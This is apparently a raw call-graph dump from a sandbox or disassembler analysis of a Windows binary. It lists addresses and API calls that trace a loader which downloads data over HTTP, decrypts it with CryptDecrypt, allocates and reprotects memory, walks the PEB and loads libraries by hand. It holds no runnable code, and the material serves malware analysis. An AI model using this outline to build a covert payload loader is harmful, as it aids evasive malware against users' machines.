37191->37054 37235 100026ff 37192->37235 37194 10001722 37194->36996 37194->37001 37200 10007102 37197->37200 37198 10007106 37215 10001629 InternetOpenA 37198->37215 37216 10005926 14 API calls __dosmaperr 37198->37216 37200->37198 37202 10007140 37200->37202 37200->37215 37201 10007130 37217 1000584c 25 API calls __strnicoll 37201->37217 37218 100069d1 37 API calls 2 library calls 37202->37218 37205 1000714c 37206 10007156 37205->37206 37209 1000716d 37205->37209 37219 1000a31e 25 API calls 2 library calls 37206->37219 37208 100071ef 37208->37215 37220 10005926 14 API calls __dosmaperr 37208->37220 37209->37208 37210 10007244 37209->37210 37210->37215 37222 10005926 14 API calls __dosmaperr 37210->37222 37213 10007238 37221 1000584c 25 API calls __strnicoll 37213->37221 37215->37050 37215->37051 37216->37201 37217->37215 37218->37205 37219->37215 37220->37213 37221->37215 37222->37215 37225 100017ff 37223->37225 37224 1000180d __InternalCxxFrameHandler 37224->37150 37225->37224 37227 1000188f 27 API calls __InternalCxxFrameHandler 37225->37227 37227->37224 37228->37174 37229->37188 37230->37188 37231->37179 37232->37180 37233->37180 37234->37178 37236 10002707 37235->37236 37237 10002708 IsProcessorFeaturePresent 37235->37237 37236->37194 37239 10002b1c 37237->37239 37242 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37239->37242 37241 10002bff 37241->37194 37242->37241 37243->37080 37244 4034c0 CryptAcquireContextW 37245 40360a GetLastError CryptReleaseContext 37244->37245 37246 40354e CryptCreateHash 37244->37246 37247 403754 37245->37247 37246->37245 37248 403572 37246->37248 37249 40377a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37247->37249 37253 4037a2 37247->37253 37268 409035 37248->37268 37293 408ec2 37249->37293 37252 40379e 37300 40c26f 37253->37300 37254 4035aa 37282 40e46b 37254->37282 37259 4035e6 CryptDeriveKey 37259->37245 37261 403625 37259->37261 37260 4035d8 GetLastError 37260->37247 37286 40e2bd 37261->37286 37263 40362b __InternalCxxFrameHandler 37264 409035 27 API calls 37263->37264 37267 40364a __InternalCxxFrameHandler 37264->37267 37265 403748 CryptDestroyKey 37265->37247 37266 4036bc CryptDecrypt 37266->37265 37266->37267 37267->37265 37267->37266 37270 408ff7 37268->37270 37269 40e2bd ___std_exception_copy 15 API calls 37269->37270 37270->37269 37271 409016 37270->37271 37273 409018 37270->37273 37307 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 37270->37307 37271->37254 37274 401600 Concurrency::cancel_current_task 37273->37274 37275 409022 37273->37275 37305 40a370 RaiseException 37274->37305 37308 40a370 RaiseException 37275->37308 37278 40161c 37306 40a131 26 API calls 2 library calls 37278->37306 37279 4097b1 37281 401643 37281->37254 37283 40e479 37282->37283 37309 40e2c8 37283->37309 37291 41249e _unexpected 37286->37291 37287 4124dc 37347 40c339 14 API calls _free 37287->37347 37289 4124c7 RtlAllocateHeap 37290 4124da 37289->37290 37289->37291 37290->37263 37291->37287 37291->37289 37346 40ff9c RtlEnterCriticalSection RtlLeaveCriticalSection _unexpected 37291->37346 37294 408eca 37293->37294 37295 408ecb IsProcessorFeaturePresent 37293->37295 37294->37252 37297 408f12 37295->37297 37348 408ed5 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37297->37348 37299 408ff5 37299->37252 37349 40c1fb 25 API calls 2 library calls 37300->37349 37302 40c27e 37350 40c28c 11 API calls __FrameHandler3::FrameUnwindToState 37302->37350 37304 40c28b 37305->37278 37306->37281 37307->37270 37308->37279 37310 40e2df 37309->37310 37311 40e2f1 37310->37311 37312 40e309 37310->37312 37321 4035bc CryptHashData 37310->37321 37336 40c339 14 API calls _free 37311->37336 37338 40c369 37 API calls 2 library calls 37312->37338 37315 40e314 37317 40e341 37315->37317 37318 40e322 37315->37318 37316 40e2f6 37337 40c25f 25 API calls __cftof 37316->37337 37322 40e413 37317->37322 37323 40e349 37317->37323 37339 413393 19 API calls 3 library calls 37318->37339 37321->37259 37321->37260 37322->37321 37344 4132ab MultiByteToWideChar 37322->37344 37323->37321 37340 4132ab MultiByteToWideChar 37323->37340 37326 40e38b 37326->37321 37328 40e396 GetLastError 37326->37328 37327 40e43d 37327->37321 37345 40c339 14 API calls _free 37327->37345 37329 40e3f6 37328->37329 37335 40e3a1 37328->37335 37329->37321 37343 40c339 14 API calls _free 37329->37343 37331 40e3e0 37342 4132ab MultiByteToWideChar 37331->37342 37335->37329 37335->37331 37341 413271 37 API calls 2 library calls 37335->37341 37336->37316 37337->37321 37338->37315 37339->37321 37340->37326 37341->37335 37342->37329 37343->37321 37344->37327 37345->37321 37346->37291 37347->37290 37348->37299 37349->37302 37350->37304 37351 4020c0 37352 40213b 37351->37352 37353 4020dd 37351->37353 37354 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37352->37354 37353->37352 37355 4020e3 CreateFileA 37353->37355 37357 402149 37354->37357 37355->37352 37356 402103 WriteFile CloseHandle 37355->37356 37358 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37356->37358 37359 402135 37358->37359 37360 401880 37361 4018e9 InternetSetFilePointer InternetReadFile 37360->37361 37362 40197d __cftof 37361->37362 37363 4019a2 HttpQueryInfoA 37362->37363 37364 401d25 37363->37364 37365 4019c6 CoCreateInstance 37363->37365 37366 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37364->37366 37365->37364 37368 4019ff 37365->37368 37367 401d50 37366->37367 37368->37364 37388 402470 37368->37388 37370 401a5c MultiByteToWideChar 37371 409035 27 API calls 37370->37371 37372 401aae MultiByteToWideChar 37371->37372 37373 401b10 37372->37373 37373->37373 37403 402310 27 API calls 3 library calls 37373->37403 37375 401b2c 37377 401d56 37375->37377 37378 401c00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37375->37378 37376 401cf1 37376->37364 37380 40c26f 25 API calls 37377->37380 37378->37376 37379 409035 27 API calls 37378->37379 37382 401c37 37379->37382 37381 401d5b 37380->37381 37382->37376 37383 409035 27 API calls 37382->37383 37387 401cc4 37382->37387 37384 401cb4 37383->37384 37404 4014b0 25 API calls 3 library calls 37384->37404 37405 4014b0 25 API calls 3 library calls 37387->37405 37391 40248e __InternalCxxFrameHandler 37388->37391 37393 4024b4 37388->37393 37389 40259e 37408 4016a0 27 API calls std::_Xinvalid_argument 37389->37408 37391->37370 37392 4025a3 37409 401600 27 API calls 3 library calls 37392->37409 37393->37389 37395 402508 37393->37395 37396 40252d 37393->37396 37395->37392 37406 401600 27 API calls 4 library calls 37395->37406 37401 402519 __InternalCxxFrameHandler 37396->37401 37407 401600 27 API calls 4 library calls 37396->37407 37397 4025a8 37400 40c26f 25 API calls 37400->37389 37401->37400 37402 402580 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37401->37402 37402->37370 37403->37375 37404->37387 37405->37376 37406->37401 37407->37401 37409->37397 37410 f89cbe 37411 f89ccd 37410->37411 37414 f8a45e 37411->37414 37420 f8a479 37414->37420 37415 f8a482 CreateToolhelp32Snapshot 37416 f8a49e Module32First 37415->37416 37415->37420 37417 f8a4ad 37416->37417 37418 f89cd6 37416->37418 37421 f8a11d 37417->37421 37420->37415 37420->37416 37422 f8a148 37421->37422 37423 f8a159 VirtualAlloc 37422->37423 37424 f8a191 37422->37424 37423->37424 37424->37424 37425 40e268 37428 411ac2 37425->37428 37427 40e280 37429 411af6 _free 37428->37429 37430 411acd RtlFreeHeap 37428->37430 37429->37427 37430->37429 37431 411ae2 37430->37431 37434 40c339 14 API calls _free 37431->37434 37433 411ae8 GetLastError 37433->37429 37434->37433 37435 4b4003c 37436 4b40049 37435->37436 37450 4b40e0f SetErrorMode SetErrorMode 37436->37450 37441 4b40265 37442 4b402ce VirtualProtect 37441->37442 37444 4b4030b 37442->37444 37443 4b40439 VirtualFree 37448 4b405f4 LoadLibraryA 37443->37448 37449 4b404be 37443->37449 37444->37443 37445 4b404e3 LoadLibraryA 37445->37449 37447 4b408c7 37448->37447 37449->37445 37449->37448 37451 4b40223 37450->37451 37452 4b40d90 37451->37452 37453 4b40dad 37452->37453 37454 4b40dbb GetPEB 37453->37454 37455 4b40238 VirtualAlloc 37453->37455 37454->37455 37455->37441 37456 100079ee 37457 10007a2c 37456->37457 37458 100079fc _unexpected 37456->37458 37464 10005926 14 API calls __dosmaperr 37457->37464 37458->37457 37460 10007a17 RtlAllocateHeap 37458->37460 37463 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 37458->37463 37460->37458 37461 10007a2a 37460->37461 37463->37458 37464->37461 37465 402c70 37466 402c94 SetLastError 37465->37466 37467 402cbc 37465->37467 37543 402920 71 API calls 37466->37543 37469 402d01 SetLastError 37467->37469 37470 402d29 37467->37470 37479 402cc6 37467->37479 37545 402920 71 API calls 37469->37545 37470->37479 37483 402d94 GetNativeSystemInfo 37470->37483 37471 402ca6 37473 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37471->37473 37476 402cb8 37473->37476 37475 402d13 37478 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37475->37478 37477 402cd0 SetLastError 37480 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37477->37480 37482 402d25 37478->37482 37544 402920 71 API calls 37479->37544 37481 402ced 37480->37481 37483->37479 37484 402dc3 VirtualAlloc 37483->37484 37485 402e03 GetProcessHeap HeapAlloc 37484->37485 37486 402ddd VirtualAlloc 37484->37486 37488 402e20 VirtualFree 37485->37488 37489 402e34 37485->37489 37486->37485 37487 402def 37486->37487 37546 402920 71 API calls 37487->37546 37488->37489 37491 402e7c SetLastError 37489->37491 37492 402e9e VirtualAlloc 37489->37492 37494 402e84 37491->37494 37500 402eb7 __InternalCxxFrameHandler __cftof 37492->37500 37493 402df9 37493->37485 37547 4033d0 16 API calls ___vcrt_freefls@4 37494->37547 37496 402e8b 37497 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37496->37497 37498 402e9a 37497->37498 37500->37491 37500->37494 37501 402f9c 37500->37501 37519 402bf0 VirtualAlloc 37500->37519 37520 402a80 37501->37520 37502 403165 37503 402950 77 API calls 37502->37503 37504 403176 37503->37504 37504->37494 37509 40317e 37504->37509 37505 40303c 37505->37494 37505->37502 37528 402950 37505->37528 37507 40320a 37510 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37507->37510 37508 4031ba 37511 4031f4 37508->37511 37512 4031c5 37508->37512 37509->37507 37509->37508 37514 403220 37510->37514 37513 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37511->37513 37516 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37512->37516 37515 403206 37513->37515 37517 4031f0 37516->37517 37519->37500 37521 402bdc 37520->37521 37525 402aa0 37520->37525 37521->37505 37522 402bcb SetLastError 37522->37505 37523 402bae SetLastError 37523->37505 37525->37521 37525->37522 37525->37523 37526 402b8f SetLastError 37525->37526 37526->37505 37529 402969 37528->37529 37538 4029a5 37528->37538 37530 402974 37529->37530 37531 4029be VirtualProtect 37529->37531 37530->37538 37548 402c10 VirtualFree 37530->37548 37533 402a02 GetLastError FormatMessageA 37531->37533 37531->37538 37532 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37534 4029ba 37532->37534 37535 402a27 37533->37535 37534->37505 37535->37535 37536 402a2e LocalAlloc 37535->37536 37549 4028e0 69 API calls 37536->37549 37538->37532 37539 402a51 OutputDebugStringA LocalFree LocalFree 37540 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 37539->37540 37541 402a77 37540->37541 37541->37505 37543->37471 37544->37477 37545->37475 37546->37493 37547->37496 37548->37538 37549->37539 37550 99d208 LoadLibraryA 37551 99e61a 37550->37551 37552 10005bf4 37553 10007a3c _free 14 API calls 37552->37553 37554 10005c0c 37553->37554 37555 a9adde 37556 a9ade1 37555->37556 37557 a9ae14 37555->37557 37558 a9ade5 VirtualProtect 37556->37558 37559 a9ad7a 37556->37559 37558->37557 37560 40955c 37561 409568 __FrameHandler3::FrameUnwindToState 37560->37561 37588 4092bc 37561->37588 37563 40956f 37564 4096c2 37563->37564 37574 409599 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 37563->37574 37616 4097b2 4 API calls 2 library calls 37564->37616 37566 4096c9 37617 40f00b 37566->37617 37570 4096d7 37571 4095b8 37572 409639 37596 4098cd 37572->37596 37574->37571 37574->37572 37612 40efe5 37 API calls 2 library calls 37574->37612 37589 4092c5 37588->37589 37621 4099b3 IsProcessorFeaturePresent 37589->37621 37591 4092d1 37622 40ab6a 10 API calls 2 library calls 37591->37622 37593 4092da 37593->37563 37594 4092d6 37594->37593 37623 40ab89 7 API calls 2 library calls 37594->37623 37624 40aa10 37596->37624 37598 4098e0 GetStartupInfoW 37599 40963f 37598->37599 37600 410b89 37599->37600 37626 4167a2 37600->37626 37602 409647 37605 408020 37602->37605 37604 410b92 37604->37602 37632 416a47 37 API calls 37604->37632 37606 402470 27 API calls 37605->37606 37607 408055 37606->37607 37608 402470 27 API calls 37607->37608 37609 40807a 37608->37609 37635 4055c0 37609->37635 37612->37572 37616->37566 38367 40eea9 37617->38367 37620 40efcf 23 API calls __FrameHandler3::FrameUnwindToState 37620->37570 37621->37591 37622->37594 37623->37593 37625 40aa27 37624->37625 37625->37598 37625->37625 37627 4167dd 37626->37627 37628 4167ab 37626->37628 37627->37604 37633 4112ba 37 API calls 3 library calls 37628->37633 37630 4167ce 37634 4165e9 47 API calls 2 library calls 37630->37634 37632->37604 37633->37630 37634->37627 38054 40f20b 37635->38054 37640 402470 27 API calls 37642 40564e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37640->37642 37641 402470 27 API calls 37652 4056b9 __cftof std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37641->37652 37642->37641 37642->37652 37644 409035 27 API calls 37644->37652 37645 405a91 38060 4064d0 37645->38060 37648 405ab2 38070 4022d0 37648->38070 37651 405ac2 38074 402200 37651->38074 37652->37644 37652->37645 37659 40c26f 25 API calls 37652->37659 37665 405a45 Sleep 37652->37665 37671 402470 27 API calls 37652->37671 37676 405a6a 37652->37676 37683 405a51 37652->37683 37686 405a3b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37652->37686 38141 40f158 41 API calls 37652->38141 38142 409170 6 API calls 37652->38142 38143 409482 28 API calls 37652->38143 38144 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37652->38144 38145 408a60 37652->38145 38150 401d60 37652->38150 37656 405ad6 37657 405bab 37656->37657 37658 405ade 37656->37658 38186 406770 39 API calls 2 library calls 37657->38186 37663 405af1 37658->37663 37664 405b4e 37658->37664 37659->37652 37662 405bb0 37669 4022d0 27 API calls 37662->37669 38176 406550 39 API calls 2 library calls 37663->38176 38181 406660 39 API calls 2 library calls 37664->38181 37665->37652 37668 405af6 37673 4022d0 27 API calls 37668->37673 37672 405bc0 37669->37672 37670 405b53 37674 4022d0 27 API calls 37670->37674 37671->37652 37677 402200 25 API calls 37672->37677 37675 405b06 37673->37675 37678 405b63 37674->37678 38177 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37675->38177 38174 408440 27 API calls 37676->38174 37681 405bd4 37677->37681 38182 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37678->38182 37687 405caa 37681->37687 37688 405bdc 37681->37688 37683->37676 38166 4037d0 37683->38166 37684 405a76 37692 402200 25 API calls 37684->37692 37685 405b0f 37693 402200 25 API calls 37685->37693 37686->37665 38195 406b10 39 API calls 2 library calls 37687->38195 38187 4067f0 39 API calls 2 library calls 37688->38187 37689 405b6c 37690 402200 25 API calls 37689->37690 37696 405b74 37690->37696 37697 405a7e 37692->37697 37698 405b17 37693->37698 38183 4066f0 39 API calls 2 library calls 37696->38183 37702 402200 25 API calls 37697->37702 38178 4065e0 39 API calls 2 library calls 37698->38178 37699 405be1 37709 4022d0 27 API calls 37699->37709 37700 405caf 37707 4022d0 27 API calls 37700->37707 37705 405a86 37702->37705 37704 405b79 37713 4022d0 27 API calls 37704->37713 38175 401710 CoUninitialize 37705->38175 37706 405b1c 37714 4022d0 27 API calls 37706->37714 37710 405cbf 37707->37710 37711 405bf1 37709->37711 37720 402200 25 API calls 37710->37720 38188 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37711->38188 37717 405b89 37713->37717 37715 405b2c 37714->37715 38179 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37715->38179 37716 405bfa 37719 402200 25 API calls 37716->37719 38184 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37717->38184 37723 405c02 37719->37723 37724 405cd3 37720->37724 37722 405b35 37726 402200 25 API calls 37722->37726 38189 406870 39 API calls 2 library calls 37723->38189 37728 405d94 37724->37728 38196 406b90 39 API calls 2 library calls 37724->38196 37725 405b92 37729 402200 25 API calls 37725->37729 37730 405b3d 37726->37730 38204 406eb0 39 API calls 2 library calls 37728->38204 37734 405b9a 37729->37734 38180 408440 27 API calls 37730->38180 37731 405c07 37740 4022d0 27 API calls 37731->37740 38185 408440 27 API calls 37734->38185 37736 405ce0 37743 4022d0 27 API calls 37736->37743 37737 405d9e 37744 4022d0 27 API calls 37737->37744 37739 405b49 38082 4016b0 37739->38082 37742 405c17 37740->37742 38190 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37742->38190 37747 405cf0 37743->37747 37748 405dae 37744->37748 37745 406136 38086 407c30 37745->38086 38197 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37747->38197 37756 402200 25 API calls 37748->37756 37750 405c20 37754 402200 25 API calls 37750->37754 37752 405cf9 37755 402200 25 API calls 37752->37755 37753 40613f 37763 4022d0 27 API calls 37753->37763 37757 405c28 37754->37757 37758 405d01 37755->37758 37759 405dc2 37756->37759 38191 4068f0 39 API calls 2 library calls 37757->38191 38198 406c10 39 API calls 2 library calls 37758->38198 37762 405ea9 37759->37762 38205 406f30 39 API calls 2 library calls 37759->38205 38215 4072d0 39 API calls 2 library calls 37762->38215 37768 406152 37763->37768 37764 405c2d 37772 4022d0 27 API calls 37764->37772 37766 405d06 37775 4022d0 27 API calls 37766->37775 38096 407bb0 37768->38096 37769 405eb3 37776 4022d0 27 API calls 37769->37776 37770 405dcf 37778 4022d0 27 API calls 37770->37778 37774 405c3d 37772->37774 37773 40615d 37782 4022d0 27 API calls 37773->37782 37783 402200 25 API calls 37774->37783 37777 405d16 37775->37777 37779 405ec3 37776->37779 38199 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37777->38199 37781 405ddf 37778->37781 37794 402200 25 API calls 37779->37794 38206 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37781->38206 37786 406170 37782->37786 37787 405c51 37783->37787 37784 405d1f 37788 402200 25 API calls 37784->37788 38106 407b10 37786->38106 37792 405c72 37787->37792 37793 405c55 37787->37793 37795 405d27 37788->37795 37789 405de8 37796 402200 25 API calls 37789->37796 37791 40617b 37809 4022d0 27 API calls 37791->37809 38193 406a00 39 API calls 2 library calls 37792->38193 38192 406980 39 API calls 2 library calls 37793->38192 37799 405ed7 37794->37799 38200 406c90 39 API calls 2 library calls 37795->38200 37801 405df0 37796->37801 37804 405f59 37799->37804 37805 405edb 37799->37805 38207 406fb0 39 API calls 2 library calls 37801->38207 37802 405c77 37816 4022d0 27 API calls 37802->37816 37803 405c5a 37818 4022d0 27 API calls 37803->37818 38222 4074f0 39 API calls 2 library calls 37804->38222 38216 407360 39 API calls 2 library calls 37805->38216 37806 405d2c 37815 4022d0 27 API calls 37806->37815 37808 405df5 37820 4022d0 27 API calls 37808->37820 37812 40618e 37809->37812 38116 408560 37812->38116 37813 405f5e 37827 4022d0 27 API calls 37813->37827 37814 405ee0 37824 4022d0 27 API calls 37814->37824 37819 405d3c 37815->37819 37821 405c87 37816->37821 37823 405c6a 37818->37823 37834 402200 25 API calls 37819->37834 37825 405e05 37820->37825 37836 402200 25 API calls 37821->37836 38241 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37823->38241 37829 405ef0 37824->37829 38208 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37825->38208 37828 405f6e 37827->37828 37845 402200 25 API calls 37828->37845 38217 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37829->38217 37831 4061bb 38124 408670 37831->38124 37840 405d50 37834->37840 37835 405e0e 37841 402200 25 API calls 37835->37841 37842 405c9b 37836->37842 37838 40611b 37844 402200 25 API calls 37838->37844 37839 405ef9 37846 402200 25 API calls 37839->37846 37847 405d54 37840->37847 37848 405d5e 37840->37848 37849 405e16 37841->37849 37842->37739 38194 406a90 39 API calls 2 library calls 37842->38194 37844->37739 37851 405f82 37845->37851 37852 405f01 37846->37852 38201 406d20 39 API calls 2 library calls 37847->38201 38202 406da0 39 API calls 2 library calls 37848->38202 38209 407030 39 API calls 2 library calls 37849->38209 37850 4085c0 27 API calls 37857 4061e8 37850->37857 37858 406004 37851->37858 37859 405f86 37851->37859 38218 4073e0 39 API calls 2 library calls 37852->38218 37863 408670 27 API calls 37857->37863 38229 407700 39 API calls 2 library calls 37858->38229 38223 407580 39 API calls 2 library calls 37859->38223 37861 405e1b 37872 4022d0 27 API calls 37861->37872 37862 405d63 37873 4022d0 27 API calls 37862->37873 37867 4061fd 37863->37867 37866 405f06 37876 4022d0 27 API calls 37866->37876 37870 4085c0 27 API calls 37867->37870 37868 406009 37879 4022d0 27 API calls 37868->37879 37869 405f8b 37880 4022d0 27 API calls 37869->37880 37871 406215 37870->37871 37875 402200 25 API calls 37871->37875 37877 405e2b 37872->37877 37874 405d73 37873->37874 37889 402200 25 API calls 37874->37889 37878 406223 37875->37878 37881 405f16 37876->37881 38210 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37877->38210 37884 402200 25 API calls 37878->37884 37885 406019 37879->37885 37886 405f9b 37880->37886 38219 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37881->38219 37883 405e34 37888 402200 25 API calls 37883->37888 37890 40622e 37884->37890 37900 402200 25 API calls 37885->37900 38224 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37886->38224 37893 405e3c 37888->37893 37894 405d87 37889->37894 37895 402200 25 API calls 37890->37895 37892 405f1f 37897 402200 25 API calls 37892->37897 38211 4070b0 39 API calls 2 library calls 37893->38211 37894->37739 38203 406e30 39 API calls 2 library calls 37894->38203 37899 406239 37895->37899 37896 405fa4 37901 402200 25 API calls 37896->37901 37902 405f27 37897->37902 37906 402200 25 API calls 37899->37906 37907 40602d 37900->37907 37908 405fac 37901->37908 38220 407470 39 API calls 2 library calls 37902->38220 37904 405e41 37919 4022d0 27 API calls 37904->37919 37911 406244 37906->37911 37912 406031 37907->37912 37913 406084 37907->37913 38225 407600 39 API calls 2 library calls 37908->38225 37910 405f2c 37922 4022d0 27 API calls 37910->37922 37917 402200 25 API calls 37911->37917 38230 407790 39 API calls 2 library calls 37912->38230 38235 407910 39 API calls 2 library calls 37913->38235 37915 405fb1 37925 4022d0 27 API calls 37915->37925 37921 40624f 37917->37921 37918 406036 37928 4022d0 27 API calls 37918->37928 37923 405e51 37919->37923 37920 406089 37931 4022d0 27 API calls 37920->37931 37924 402200 25 API calls 37921->37924 37926 405f3c 37922->37926 37936 402200 25 API calls 37923->37936 37927 40625a 37924->37927 37929 405fc1 37925->37929 38221 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37926->38221 37932 402200 25 API calls 37927->37932 37933 406046 37928->37933 38226 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37929->38226 37937 406099 37931->37937 37938 406265 37932->37938 38231 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37933->38231 37935 405f45 37941 402200 25 API calls 37935->37941 37942 405e65 37936->37942 37951 402200 25 API calls 37937->37951 37943 402200 25 API calls 37938->37943 37940 405fca 37945 402200 25 API calls 37940->37945 37941->37739 37946 405e6e 37942->37946 38212 407140 39 API calls 2 library calls 37942->38212 37986 406274 37943->37986 37944 40604f 37948 402200 25 API calls 37944->37948 37949 405fd2 37945->37949 38213 4071c0 39 API calls 2 library calls 37946->38213 37954 406057 37948->37954 38227 407680 39 API calls 2 library calls 37949->38227 37952 4060ad 37951->37952 37952->37739 38236 407990 39 API calls 2 library calls 37952->38236 37953 405e78 37961 4022d0 27 API calls 37953->37961 38232 407810 39 API calls 2 library calls 37954->38232 37957 405fd7 37964 4022d0 27 API calls 37957->37964 37959 40605c 37965 4022d0 27 API calls 37959->37965 37960 4060b6 37968 4022d0 27 API calls 37960->37968 37963 405e88 37961->37963 37962 4062d9 Sleep 37962->37986 37974 402200 25 API calls 37963->37974 37966 405fe7 37964->37966 37969 40606c 37965->37969 38228 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37966->38228 37972 4060c6 37968->37972 38233 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37969->38233 37971 405ff0 37976 402200 25 API calls 37971->37976 38237 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37972->38237 37973 4022d0 27 API calls 37973->37986 37978 405e9c 37974->37978 37975 406075 37979 402200 25 API calls 37975->37979 37976->37739 37978->37739 38214 407250 39 API calls 2 library calls 37978->38214 37981 40607d 37979->37981 37980 4060cf 37982 402200 25 API calls 37980->37982 38234 407890 39 API calls 2 library calls 37981->38234 37985 4060d7 37982->37985 38238 407a10 39 API calls 2 library calls 37985->38238 37986->37962 37986->37973 37987 4062e2 37986->37987 37992 4062d1 37986->37992 37988 402200 25 API calls 37987->37988 37990 4062ea 37988->37990 38127 408490 37990->38127 37991 4060dc 37997 4022d0 27 API calls 37991->37997 37994 402200 25 API calls 37992->37994 37994->37962 37995 4062fe 37998 408490 27 API calls 37995->37998 37996 406082 37999 4022d0 27 API calls 37996->37999 38000 4060ec 37997->38000 38001 406317 37998->38001 37999->37823 38239 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38000->38239 38003 408490 27 API calls 38001->38003 38008 40632a 38003->38008 38004 4060f5 38005 402200 25 API calls 38004->38005 38006 4060fd 38005->38006 38240 407a90 39 API calls 2 library calls 38006->38240 38010 408490 27 API calls 38008->38010 38011 406352 38008->38011 38010->38011 38242 407cc0 39 API calls 2 library calls 38011->38242 38012 40635f 38013 4022d0 27 API calls 38012->38013 38014 40636f 38013->38014 38015 402200 25 API calls 38014->38015 38016 406383 38015->38016 38017 406420 38016->38017 38019 4016b0 27 API calls 38016->38019 38245 407e30 39 API calls 2 library calls 38017->38245 38020 40639e 38019->38020 38243 407d50 39 API calls 2 library calls 38020->38243 38021 406425 38024 4022d0 27 API calls 38021->38024 38023 4063a7 38026 4022d0 27 API calls 38023->38026 38025 406438 38024->38025 38027 402200 25 API calls 38025->38027 38029 4063b7 38026->38029 38028 40644f 38027->38028 38053 4064af 38028->38053 38246 407fa0 39 API calls 2 library calls 38028->38246 38034 4063e7 38029->38034 38035 4063d8 Sleep 38029->38035 38031 4037d0 39 API calls 38033 4064c0 38031->38033 38032 406460 38037 4022d0 27 API calls 38032->38037 38039 4022d0 27 API calls 38034->38039 38035->38029 38036 4063e5 38035->38036 38038 406409 38036->38038 38041 40646f 38037->38041 38040 402200 25 API calls 38038->38040 38042 4063fe 38039->38042 38043 406411 38040->38043 38247 407f20 39 API calls 2 library calls 38041->38247 38045 402200 25 API calls 38042->38045 38244 401710 CoUninitialize 38043->38244 38045->38038 38047 406483 38048 4022d0 27 API calls 38047->38048 38049 406492 38048->38049 38248 407ec0 39 API calls __Init_thread_footer 38049->38248 38051 4064a0 38052 4022d0 27 API calls 38051->38052 38052->38053 38053->38031 38249 40f188 38054->38249 38056 40560f 38057 40f042 38056->38057 38260 4111fd GetLastError 38057->38260 38061 4064fc 38060->38061 38069 40652e 38060->38069 38297 409170 6 API calls 38061->38297 38063 408ec2 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 38065 406540 38063->38065 38064 406506 38064->38069 38298 409482 28 API calls 38064->38298 38065->37648 38067 406524 38299 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38067->38299 38069->38063 38071 4022f3 38070->38071 38071->38071 38072 402470 27 API calls 38071->38072 38073 402305 38072->38073 38073->37651 38075 40220b 38074->38075 38076 402226 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38074->38076 38075->38076 38077 40c26f 25 API calls 38075->38077 38076->37656 38078 40224a 38077->38078 38079 402281 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38078->38079 38080 40c26f 25 API calls 38078->38080 38079->37656 38081 4022cc 38080->38081 38083 4016c3 __cftof 38082->38083 38084 409035 27 API calls 